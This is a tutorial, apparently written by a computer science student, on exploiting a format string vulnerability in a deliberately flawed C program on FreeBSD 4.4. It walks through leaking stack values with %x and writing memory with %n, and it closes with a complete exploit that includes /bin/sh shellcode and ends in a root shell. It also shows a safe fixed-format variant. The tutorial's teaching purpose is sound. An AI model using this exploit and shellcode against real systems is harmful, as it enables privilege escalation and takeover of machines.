Format String Bug

I wrote the following article during my second year of computer science school. The “format string bug” technique has been around for many years, and basically makes it possible to take control of a machine running a program with such a flaw. Surprisingly, a lot of current exploits still use it (a lot of programs rely on C libraries), so it is still important to know about it. To understand what follows, you should be familiar with C programming, the gdb debugger and the memory layout of a process. I created and tested the exploit on FreeBSD 4.4.

The Format String vulnerability (on FreeBSD 4.4)

A vulnerable program:
Take a look at the following simple program. It reads from the standard input and prints what you type on the standard output. The aim of the exploit is to obtain a root shell from this program.

bash-2.05$ cat vuln.c
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void foo(char* tmp, char* buf)
{
    sprintf(tmp, buf);
    printf("%s", tmp);
}

int main(int argc, char** argv)
{
  char tmp[512];
  char buf[512];

  while(1)
    {
      memset(buf, '\0', 512);
      read(0, buf, 512);
      if (!strcmp(buf, "exit\n"))
        break;
      foo(tmp, buf);
    }
  return 0;
}

bash-2.05$ cc -o vuln vuln.c
bash-2.05$ ./vuln
yo!
yo!
epita
epita
%x
0
%x %x %x
0 bfbff450 bfbff450
exit
bash-2.05$

As you can see, the program prints out some numbers when you input “%x”. What are these numbers? The input is read into a 512-byte buffer buf, which is then passed to the function foo(). There, buf is copied into another 512-byte buffer tmp by sprintf(), and tmp is printed out via printf(). The vulnerability is that sprintf() uses buf as its format string and therefore interprets it. If you look at the manual of the printf family, you will find the list of conversion specifications that get interpreted. If buf contains “%x”, for example, sprintf() will fetch an argument from the stack and print it in hexadecimal. Here the only parameters actually passed are the output buffer tmp and the input string buf, so each “%x” makes the program print a 4-byte value from whatever lies next on the stack.
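For contrast, here is a minimal sketch of how foo() could avoid interpreting its input. The name foo_safe and the extra size parameter are assumptions made for this illustration; they are not part of vuln.c.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical safe variant of foo(): the user input is passed as DATA to a
   fixed "%s" format, so "%x" or "%n" inside buf are copied literally.
   snprintf() also bounds the copy to tmp_size bytes. */
void foo_safe(char *tmp, size_t tmp_size, const char *buf)
{
    assert(tmp_size > 0);
    snprintf(tmp, tmp_size, "%s", buf);
    printf("%s", tmp);
}
```

Called as foo_safe(tmp, sizeof tmp, buf) from main, an input of “%x” would simply be echoed back as “%x”.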

The power of the format buffer

With this in mind you can find useful information on the stack, such as a saved ebp/return address pair. You can recognize such a pair because the return address points to low addresses like 0x80?????.

bash-2.05$ ./vuln
%x %x %x %x %x
0 bfbff450 293 2805f000 bfbff850
%x %x %x %x %x %x
0 bfbff450 bfbff450 1 bfbff850 8048642

Here we get the pair “bfbff850/8048642” saved by the function that calls sprintf, which is foo. This tells us that the base pointer ebp of foo’s caller (main in our program) is 0xbfbff850. Consequently the return address of main is saved at 0xbfbff854, 4 bytes further. How can we change the value stored at 0xbfbff854 in order to execute what we want?
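Spotting such a pair by eye can be sketched as a small helper that scans a line of leaked hex words. The function name and the two address ranges (0xbfbf.... for the stack, 0x0804.... for the program text) are assumptions taken from this particular session, not general rules.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

/* Assumed ranges, valid only for the FreeBSD 4.4 i386 session shown here. */
static int is_stack_addr(uint32_t v) { return (v >> 16) == 0xbfbfu; }
static int is_text_addr(uint32_t v)  { return (v >> 16) == 0x0804u; }

/* Returns the 0-based position of the first word that looks like a saved ebp
   immediately followed by a return address, or -1 if there is none. */
int find_frame_pair(const char *leak)
{
    uint32_t prev = 0;
    int have_prev = 0;
    int pos = 0;

    assert(leak != NULL);
    for (;;) {
        char *end;
        unsigned long v = strtoul(leak, &end, 16);
        if (end == leak)              /* no more hex words on the line */
            break;
        if (have_prev && is_stack_addr(prev) && is_text_addr((uint32_t)v))
            return pos - 1;
        prev = (uint32_t)v;
        have_prev = 1;
        pos++;
        leak = end;
    }
    return -1;
}
```

On the second output line above, the helper reports position 4, which is the word bfbff850.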

First we should find where on the stack the buffer holding the input is located. It is a local variable of main, so it should be somewhere on the stack. We can use a series of “A” characters to determine where the buffer is.

bash-2.05$ ./vuln
AAAA-%6$x %x %x %x %x %x %x %x %x
AAAA-8048642 bfbff650 bfbff450 200 0 0 0 41414141 2078252d
AAAA-%13$x
AAAA-41414141

The buffer begins 13*sizeof(int) = 13*4 = 52 bytes after the format parameter buf of sprintf on the stack. It is also useful to determine the absolute addresses of the buffers. Let’s try to find them without gdb. We know that foo gets the addresses of the buffers as parameters, so they should be on the stack just after foo’s return address.

bash-2.05$ ./vuln
%5$x %x %x %x
bfbff850 8048642 bfbff650 bfbff450

Logically, since the size of both buffers is 512 bytes, we find that tmp begins at 0xbfbff650 = main’s ebp - 0x200 and buf begins at 0xbfbff450 = main’s ebp - 0x400.

It’s time to introduce another feature of format strings: “%n”, which makes it possible to write to memory. That’s a pretty powerful/dangerous capability! printf interprets “%n” by storing the number of characters printed so far into the int that the corresponding argument (an int*) points to, that is, into the 4 bytes at the specified address. We can try to write the number of printed characters at the address 0xbfbff470 (for example) and print this value with the help of a simple program:

#include <stdio.h>

int main()
{
  printf("\x70\xf4\xbf\xbf%%13$n %%20$x %%x %%x\n");
  return 0;
}
bash-2.05$ cc -o test test.c
bash-2.05$ (./test; cat) | ./vuln
pô¿¿ 0 4 0
exit

bash-2.05$

The program test prints a string that becomes the input of vuln. At the start of this string we put the int* address where we want the number of printed characters to be written. Then “%%13$n” (which test outputs as “%13$n”) tells sprintf to write the number of printed characters at our specified address (13 is the offset where the buffer begins, remember?). To view the result we use the string “%%20$x %%x %%x”: it prints the 3 values stored on the stack starting at address 0xbfbff46c.

(20 - 13) *sizeof(int) + address of "buf" = 7 *4 + 0xbfbff450 = 0xbfbff450 + 0x1c = 0xbfbff46c

We can see that the second value from the stack is 4 (the four address bytes are the only characters printed before “%13$n” is reached). It is located at address 0xbfbff46c + 4 = 0xbfbff470, which is the address “\x70\xf4\xbf\xbf” we asked sprintf to write the number of printed characters to.

It’s easy to imagine that you can basically write what you want where you want by using “%n” and by controlling the number of characters printed. It’s just a matter of precise calculation :)
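The counting behaviour of “%n” can be observed safely in a program that controls its own format string. This is a minimal sketch; the helper name count_via_n is an assumption for illustration, and some hardened C libraries restrict or reject “%n”, so the behaviour may differ on your system.

```c
#include <assert.h>
#include <stdio.h>

/* Formats s into out and returns, via %n, the number of characters that
   were produced before the %n directive was reached. The format string is
   a constant here, so nothing is attacker-controlled. */
int count_via_n(char *out, size_t out_size, const char *s)
{
    int count = -1;

    assert(out_size > 0);
    snprintf(out, out_size, "%s%n", s, &count);
    return count;
}
```

With a 4-character string such as "AAAA" the stored count is 4, just like the 4 observed in the experiment above after the four address bytes.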

The exploit

The idea of the exploit is to overwrite the return address of main with the address of a shellcode that executes a shell. First you need to find a shellcode that matches your OS.

We know that main’s return address is stored at 0xbfbff854. It’s easy to store the shellcode in the buffer, but how can we write its address, which is a large number? We can’t print 0xbfbff4?? characters into a 512-byte buffer: unless the vulnerable program uses a function with a length-limiting parameter n (like snprintf), doing so would overflow the buffer and make the program crash. The trick is to write the address one byte at a time, so a 4-byte address is written in 4 steps. Since sprintf writes 4 bytes for each “%n”, we must write from the lowest address to the highest so that we don’t overwrite the bytes already written. For that reason, for an address like 0xbfbff470, you need to write 0xf4 before you write 0xbf. To limit the overwriting we could use “%hn”, which makes sprintf store a short int instead of an int. Also, since the internal counter of written bytes only increases and is already at 0xf4 after the second write, we have to make it go up to 0x1bf in order to write the 0xbf we need: the low byte 0xbf lands at the target address and the extra 0x01 goes into the next byte.
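The effect of four overlapping 4-byte writes can be checked on paper, or with a small simulation on an ordinary byte array. This is only a sketch: the function names are assumptions, and nothing here touches a real stack.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Store a 32-bit value in little-endian order, as a %n write does on i386. */
static void store_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v & 0xffu);
    p[1] = (uint8_t)((v >> 8) & 0xffu);
    p[2] = (uint8_t)((v >> 16) & 0xffu);
    p[3] = (uint8_t)((v >> 24) & 0xffu);
}

/* Simulate four %n writes at consecutive byte offsets 0..3 of mem.
   counts[i] is the printed-character count at the time of write i. */
void simulate_writes(uint8_t *mem, size_t mem_size, const unsigned counts[4])
{
    assert(mem_size >= 7);            /* the last write reaches offset 6 */
    memset(mem, 0, mem_size);
    for (int i = 0; i < 4; i++)
        store_le32(mem + i, counts[i]);
}
```

With the counts 0x70, 0xf4, 0x1bf and 0x1bf, the first four bytes end up as 70 f4 bf bf, which read as a little-endian word is 0xbfbff470, and the byte right after them is clobbered with 0x01.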

The next step is to overwrite main’s return address with an arbitrary address, for example 0xbfbff470. Here is the overwrite program.

#include <stdio.h>
#include <string.h>

int main(void)
{
  char b0[256];
  char b1[256];
  char b2[256];

  // zero-fill so that each padding string is NUL-terminated
  memset(b0, 0, 256);
  memset(b1, 0, 256);
  memset(b2, 0, 256);

  memset(b0, 'A', 0x70 - 0x10);
  memset(b1, 'A', 0xf4 - 0x70);
  memset(b2, 'A', 0x01bf - 0xf4);

  printf("\x54\xf8\xbf\xbf" // the first address
         "\x55\xf8\xbf\xbf" // the second
         "\x56\xf8\xbf\xbf" // the third
         "\x57\xf8\xbf\xbf" // the fourth
         // here 0x10 bytes have been "printed" so far
         "%s" // 0x70 bytes have now been "printed"
         "%%13$n"   // writes 0x70 at the first address
         "%s"// 0xf4 bytes have now been "printed"
         "%%n" // writes 0xf4 at the second address
         "%s" // 0x1bf bytes have now been "printed"
         "%%n" // writes 0x1bf at the third address
         "%%n\n" // writes 0x1bf at the fourth address
         ,b0, b1, b2);
  return 0;
}

bash-2.05$ cc -o overwrite overwrite.c
bash-2.05$ ./vuln
%270$x
8048509
exit
bash-2.05$ (./overwrite; cat) | ./vuln
T&#xF8;&#xBF;&#xBF;U&#xF8;&#xBF;&#xBF;V&#xF8;&#xBF;&#xBF;W&#xF8;&#xBF;&#xBF;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAA
%270$x
bfbff470
exit

Segmentation fault (core dumped)
bash-2.05$

I won’t explain the program because it has lots of comments. The input “%270$x” prints out the value of main’s return address: we want to print the value stored at 0xbfbff854, and the beginning of the buffer, whose offset is 13, is at 0xbfbff450. Thus the offset of main’s return address is

13 + (0xbfbff854 - 0xbfbff450) / sizeof(int) = 13 + 1028 / 4 = 270
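The same arithmetic, in both directions, can be written as two small helpers. The function names are assumptions for illustration; the 4-byte word size matches the i386 stack used throughout this article.

```c
#include <assert.h>
#include <stdint.h>

/* Address read by positional argument k, given that argument base_index
   falls on the word at base_addr (4-byte stack words). */
uint32_t arg_address(uint32_t base_addr, unsigned base_index, unsigned k)
{
    assert(k >= base_index);
    return base_addr + (uint32_t)(k - base_index) * 4u;
}

/* Positional argument number that reads the word stored at target. */
unsigned arg_index(uint32_t base_addr, unsigned base_index, uint32_t target)
{
    assert(target >= base_addr && (target - base_addr) % 4u == 0);
    return base_index + (unsigned)((target - base_addr) / 4u);
}
```

With buf at 0xbfbff450 and offset 13, arg_index gives 270 for 0xbfbff854, and arg_address gives 0xbfbff46c for argument 20, the value used in the “%n” experiment earlier.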

The normal value of the return address is 8048509, but after our crafted input it becomes bfbff470. Hey, that’s what we want! The “Segmentation fault” is expected because, after main() returns, the process continues executing at address 0xbfbff470, and there is nothing good there.

Now we can create the final exploit. We only need to place a shellcode in the buffer. The most convenient solution is to place it just after the four addresses so that its address doesn’t depend on the length of the padding buffers b0, b1 and b2. But your shellcode should be as short as possible so that

length of the shellcode + 0x10  <= least significant byte of the address to write

For example, if you want to write the address 0xbfbff430 and your shellcode is 0x21 bytes long, then since 0x21 + 0x10 > 0x30 you will have to increase the number of printed bytes to 0x130 instead of 0x30. As the input buffer is only 0x200 bytes long, it is important to limit the padding.
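The rule behind these numbers is that the counter can only grow, so each target byte is reached by moving up to the next count whose low byte matches. A minimal sketch of that calculation follows; the function name plan_counts and its parameters are assumptions for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* counts[i] receives the total number of printed characters required when
   byte i of value (lowest byte first) is written. already is the number of
   characters printed before any padding (addresses plus shellcode). */
void plan_counts(uint32_t value, unsigned already, unsigned counts[4])
{
    unsigned cur = already;

    assert(counts != 0);
    for (int i = 0; i < 4; i++) {
        unsigned byte = (value >> (8 * i)) & 0xffu;
        /* smallest non-negative step that makes cur % 256 == byte */
        cur += (byte - cur) & 0xffu;
        counts[i] = cur;
    }
}
```

For 0xbfbff430 with 0x10 + 0x21 characters already printed, the first count comes out as 0x130, matching the example above. The difference between consecutive counts is the length of each padding string.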

Another solution is to place the shellcode at the end of the buffer and fill the padding buffers with nops. This way the execution will slide into your shellcode and you don’t have to calculate its exact address. The “%n” strings can be skipped by using a jump instruction such as “\xeb” (a short jmp). This method won’t be discussed here.

One last problem is that once we have changed main’s return address, we must type exit to break out of the main loop, and this last input overwrites our buffer buf… Fortunately the buffer tmp, where the interpreted string was written, is left untouched, so the shellcode should still be there. The address of tmp is 0xbfbff650, as we found before; consequently the address of the shellcode will be 0xbfbff660 because of the 4 addresses stored in front of it.

0xbfbff650 + 4 * 4 = 0xbfbff650 + 0x10 = 0xbfbff660

Following is the complete exploit.

bash-2.05$ cat exploit.c
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80";

int main(void)
{
  char b0[255];
  char b1[255];
  char b2[255];

  // zero-fill so that each padding string is NUL-terminated
  memset(b0, 0, 255);
  memset(b1, 0, 255);
  memset(b2, 0, 255);

  memset(b0, 'A', 0x60 - 0x10 - 0x17); // 0x10 because of the four addresses,
                                       // 0x17 because of the shellcode.
  memset(b1, 'A', 0xf6 - 0x60);
  memset(b2, 'A', 0x01bf - 0xf6);

  printf("\x54\xf8\xbf\xbf" // the first address
         "\x55\xf8\xbf\xbf" // the second
         "\x56\xf8\xbf\xbf" // the third
         "\x57\xf8\xbf\xbf" // the fourth
         // here 0x10 bytes have been "printed" so far
         "%s" // 0x27 bytes have now been "printed"
         "%s" // 0x60 bytes have now been "printed"
         "%%13$n" // writes 0x60 at the first address
         "%s" // 0xf6 bytes have now been "printed"
         "%%n" // writes 0xf6 at the second address
         "%s" // 0x1bf bytes have now been "printed"
         "%%n" // writes 0x1bf at the third address
         "%%n\n" // writes 0x1bf at the fourth address
         ,shellcode, b0, b1, b2);
  return 0;
}

bash-2.05$ cc -o exploit exploit.c
bash-2.05$ (./exploit; cat) | ./vuln
Tø¿¿Uø¿¿Vø¿¿Wø¿¿1ÀPh//shh/binãPTS°;PÍAAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
exit
ls
essai           exploit         exploit.c~      format.log      format.tex~
essai.c         exploit.c       file            format.pdf      format2.tex
essai.c~        exploit.core    format.aux      format.tex      overwrite
whoami
root
^C
bash-2.05$

It works!
